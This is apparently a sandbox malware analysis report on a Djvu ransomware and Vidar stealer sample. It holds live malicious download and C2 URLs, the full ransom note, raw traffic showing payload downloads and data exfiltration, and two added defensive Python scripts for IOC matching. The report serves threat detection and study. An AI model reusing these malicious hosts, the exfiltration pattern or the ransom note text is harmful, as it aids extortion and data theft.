Windows Analysis Report
2OmglUwx83.exe

Overview

General Information

Sample Name: 2OmglUwx83.exe
Analysis ID: 679173
MD5: 24b6effdd763befb6ff4a657e15c77bc
SHA1: dd09691ceccd54d7e68a9c6553a6b94452dc7c85
SHA256: d0202dee37da4da0375e0034e802e0351cf3185cc8cd6ad041ffca4c89d97797
Tags: exeStop

Detection

Djvu, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found ransom note / readme
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign process
Contains functionality to inject code into remote processes
Writes many files with high entropy
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Uses cacls to modify the permissions of files
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapter information

Classification

AV Detection

Source: http://rgyui.top/dl/build2.exe Avira URL Cloud: Label: malware
Source: http://acacaca.org/test2/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true Avira URL Cloud: Label: malware
Source: http://rgyui.top/dl/build2.exe$run Avira URL Cloud: Label: malware
Source: http://acacaca.org/files/1/build3.exe Avira URL Cloud: Label: malware
Source: http://acacaca.org/files/1/build3.exerun0d Avira URL Cloud: Label: malware
Source: http://acacaca.org/test2/get.php Avira URL Cloud: Label: malware
Source: http://acacaca.org/files/1/build3.exed5 Avira URL Cloud: Label: malware
Source: http://rgyui.top/dl/build2.exerunb4e97Bx Avira URL Cloud: Label: malware
Source: http://rgyui.top/dl/build2.exe~ Avira URL Cloud: Label: malware
Source: http://acacaca.org/files/1/build3.exe$run Avira URL Cloud: Label: malware
Source: 2OmglUwx83.exe Virustotal: Detection: 54%
Source: 2OmglUwx83.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Metadefender: Detection: 37%
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe Metadefender: Detection: 37%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe ReversingLabs: Detection: 80%
Source: 2OmglUwx83.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe Joe Sandbox ML: detected
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", 
"C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\W
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040E870
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040EAA0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 1_2_00410FC0
Source: 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
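
Added example (not code from the report, from Joe Sandbox, or from the sample): applying the extracted Djvu "Ignore Files" list to candidate paths to see which files the sample would have left alone. The matching rule used here, a case-sensitive substring test of every entry against the full path after expanding %username%, is an assumption; it is consistent with the _wcsstr / PathFindExtensionW calls in the directory-walk functions 1_2_00410160 and 1_2_0040F730 below, but the report does not state it. Only part of the extracted list is reproduced, and the sample paths are constructed.

```python
"""Evaluate which paths the extracted Djvu configuration would skip.

Added example, not code from the report or from the sample. Takes entries
from the Malware Configuration Extractor "Ignore Files" list and applies an
ASSUMED rule: case-sensitive substring match of each entry against the full
path, with %username% expanded first.
"""

# Subset of the extracted "Ignore Files" list (the report truncates the full list).
IGNORE_FILES = [
    "ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol",
    ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms",
    "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\",
    "C:\\Users\\%username%\\AppData\\Roaming\\",
    "C:\\Users\\%username%\\AppData\\Local\\",
    "C:\\Windows\\", "C:\\ProgramData\\", "C:\\$Recycle.Bin\\",
    "C:\\Program Files\\", "C:\\Program Files (x86)\\",
]
RANSOM_NOTE = "_readme.txt"  # "Ransom note file" from the extracted config


def expand(entries, username):
    """Replace the %username% placeholder with the real account name."""
    return [e.replace("%username%", username) for e in entries]


def is_ignored(path, username, entries=IGNORE_FILES):
    """True if the path would be skipped (assumed substring rule, plus the note)."""
    if path.rsplit("\\", 1)[-1] == RANSOM_NOTE:
        return True
    return any(e in path for e in expand(entries, username))


def partition(paths, username):
    """Split candidate paths into (would_be_encrypted, skipped)."""
    enc, skip = [], []
    for p in paths:
        (skip if is_ignored(p, username) else enc).append(p)
    return enc, skip


# Constructed listing for the sandbox account "user".
SAMPLE_PATHS = [
    r"C:\Users\user\Documents\budget.xlsx",
    r"C:\Users\user\Pictures\holiday.jpg",
    r"C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe",
    r"C:\Windows\System32\drivers\etc\hosts",
    r"C:\Program Files\Tool\tool.dll",
    r"C:\Users\user\Desktop\notes.ini",
    r"C:\Users\user\_readme.txt",
    r"D:\Shares\backup.sql",
]

if __name__ == "__main__":
    enc, skip = partition(SAMPLE_PATHS, "user")
    print("would be encrypted:", *enc, sep="\n  ")
    print("skipped:", *skip, sep="\n  ")
```

The skip list covers the directory the sample drops build2.exe into (C:\Users\user\AppData\Local\) and the ransom note name, so those survive; a user document outside the listed directories and without a listed extension is in scope. The extracted list also carries D:, E: and F: entries, which is why the constructed D: path is not skipped here.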

Compliance

Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Unpacked PE file: 13.2.build2.exe.60900000.1.unpack
Source: 2OmglUwx83.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\_readme.txt
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\_readme.txt
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49785 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 2OmglUwx83.exe, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 
0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\bocepe redipov\son kihaseleyadej54\p.pdb source: build2.exe, 0000000C.00000000.393039147.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000C.00000002.412815687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000D.00000000.403227306.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe.8.dr, build2[1].exe.8.dr
Source: Binary string: C:\bukasilo15\tili 3.pdb source: 2OmglUwx83.exe
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 2OmglUwx83.exe, 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 
0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: ?"C:\bocepe redipov\son kihaseleyadej54\p.pdb source: build2.exe, 0000000C.00000000.393039147.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000C.00000002.412815687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000D.00000000.403227306.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe.8.dr, build2[1].exe.8.dr
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730

Networking

Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50519 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.7:49771 -> 151.251.24.5:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.7:49771 -> 151.251.24.5:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 5.163.244.118:80 -> 192.168.2.7:49772
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.7:49773 -> 5.163.244.118:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.7:49773 -> 5.163.244.118:80
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: Malware configuration extractor URLs: http://acacaca.org/test2/get.php
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /pegasusfly1 HTTP/1.1Host: t.me
Source: global traffic HTTP traffic detected: GET /517 HTTP/1.1Host: 49.12.9.140:1080
Source: global traffic HTTP traffic detected: GET /2277399138.zip HTTP/1.1Host: 49.12.9.140:1080Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----8838260965650276Host: 49.12.9.140:1080Content-Length: 118025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Aug 2022 09:22:38 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 02 Aug 2022 09:14:30 GMTETag: "6d800-5e53e8b405d14"Accept-Ranges: bytesContent-Length: 448512Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 40 7c 08 d3 21 12 5b d3 21 12 5b d3 21 12 5b cd 73 87 5b c4 21 12 5b cd 73 91 5b 5b 21 12 5b f4 e7 69 5b d4 21 12 5b d3 21 13 5b 02 21 12 5b cd 73 96 5b ec 21 12 5b cd 73 86 5b d2 21 12 5b cd 73 83 5b d2 21 12 5b 52 69 63 68 d3 21 12 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 d6 cc d3 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 03 00 00 7e 04 00 00 00 00 00 90 b9 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 07 00 00 04 00 00 10 a7 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 22 03 00 50 00 00 00 00 a0 06 00 d0 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 24 03 00 00 10 00 00 00 26 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 29 03 00 00 40 03 00 00 9a 02 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 00 c0 2e 7a 6f 6e 61 6d 69 00 00 04 00 00 00 70 06 00 00 04 00 00 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 79 6f 73 6f 7a 69 00 00 04 00 00 00 80 06 00 00 04 00 00 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 61 79 00 00 00 00 96 00 00 00 00 90 06 00 00 02 00 00 00 cc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 08 01 00 00 a0 06 00 00 0a 01 00 00 ce 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View IP Address: 162.0.217.254 162.0.217.254
Source: global traffic TCP traffic: 192.168.2.7:49780 -> 49.12.9.140:1080
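
Added example (not code from the report or from the sample): matching the network indicators above against HTTP log records. The log format (one record per line: method, host[:port], path, content-type) is constructed for the example. Two rules generalise beyond the literal indicators and are assumptions: the Djvu beacon pattern accepts any pid of 32 uppercase hex digits and any value for the first parameter (the report shows one pid and first=true only), and the Vidar-like chain rule is derived solely from the sequence seen here (GET /<digits>, GET /<digits>.zip, then a multipart POST, all to one IP on a non-standard port). The t.me profile fetch is tagged on its own.

```python
"""Match this report's network indicators against HTTP log records.

Added example; not code from the report or from the sample. Log format,
sample records and the generalised rules (beacon regex, chain rule) are
constructed assumptions, see the lead-in.
"""
import re
from collections import defaultdict

IOC_URLS = {  # Malware Configuration Extractor output, as host + path
    "rgyui.top/dl/build2.exe": "djvu_download_url",
    "acacaca.org/files/1/build3.exe": "djvu_download_url",
    "acacaca.org/test2/get.php": "djvu_c2",
}
IOC_JA3 = {"37f463bf4616ecd445d4a1937da06e19"}  # JA3 listed in the report
DJVU_BEACON = re.compile(r"^/test2/get\.php\?pid=[0-9A-F]{32}&first=\w+$")  # assumed shape
VIDAR_CFG = re.compile(r"^/\d+$")        # observed: GET /517
VIDAR_ZIP = re.compile(r"^/\d+\.zip$")   # observed: GET /2277399138.zip
STANDARD_PORTS = {80, 443}


def parse(line):
    """Constructed format: METHOD HOST[:PORT] PATH CONTENT-TYPE."""
    method, hostport, path, ctype = line.split(maxsplit=3)
    host, _, port = hostport.partition(":")
    return {"method": method, "host": host, "port": int(port or 80),
            "path": path, "ctype": ctype}


def classify(rec):
    """Per-record tags: known IOC URL, beacon shape, odd port, t.me fetch."""
    tags = set()
    key = rec["host"] + rec["path"].split("?", 1)[0]
    if key in IOC_URLS:
        tags.add(IOC_URLS[key])
    if rec["host"] == "acacaca.org" and DJVU_BEACON.match(rec["path"]):
        tags.add("djvu_beacon")
    if rec["port"] not in STANDARD_PORTS:
        tags.add("http_nonstandard_port")
    if rec["host"] == "t.me" and rec["method"] == "GET":
        tags.add("tme_profile_fetch")
    return tags


def vidar_chain(records):
    """host:port endpoints that received the complete cfg / zip / exfil sequence."""
    steps = defaultdict(set)
    for r in records:
        ep = f"{r['host']}:{r['port']}"
        if r["method"] == "GET" and VIDAR_CFG.match(r["path"]):
            steps[ep].add("cfg")
        elif r["method"] == "GET" and VIDAR_ZIP.match(r["path"]):
            steps[ep].add("zip")
        elif r["method"] == "POST" and r["ctype"].startswith("multipart/form-data"):
            steps[ep].add("exfil")
    return sorted(ep for ep, s in steps.items() if {"cfg", "zip", "exfil"} <= s)


def ja3_hit(fingerprint):
    return fingerprint.lower() in IOC_JA3


def scan(log):
    """Return (per-record hits, endpoints showing the Vidar-like chain)."""
    records = [parse(l) for l in log.splitlines() if l.strip()]
    hits = [(r["method"], r["host"], r["path"], sorted(classify(r))) for r in records]
    return hits, vidar_chain(records)


# Constructed log mirroring the requests in the Networking section.
SAMPLE_LOG = """\
GET t.me /pegasusfly1 -
GET 49.12.9.140:1080 /517 -
GET 49.12.9.140:1080 /2277399138.zip -
POST 49.12.9.140:1080 / multipart/form-data
GET acacaca.org /test2/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true -
GET rgyui.top /dl/build2.exe -
GET www.example.com /index.html -
"""

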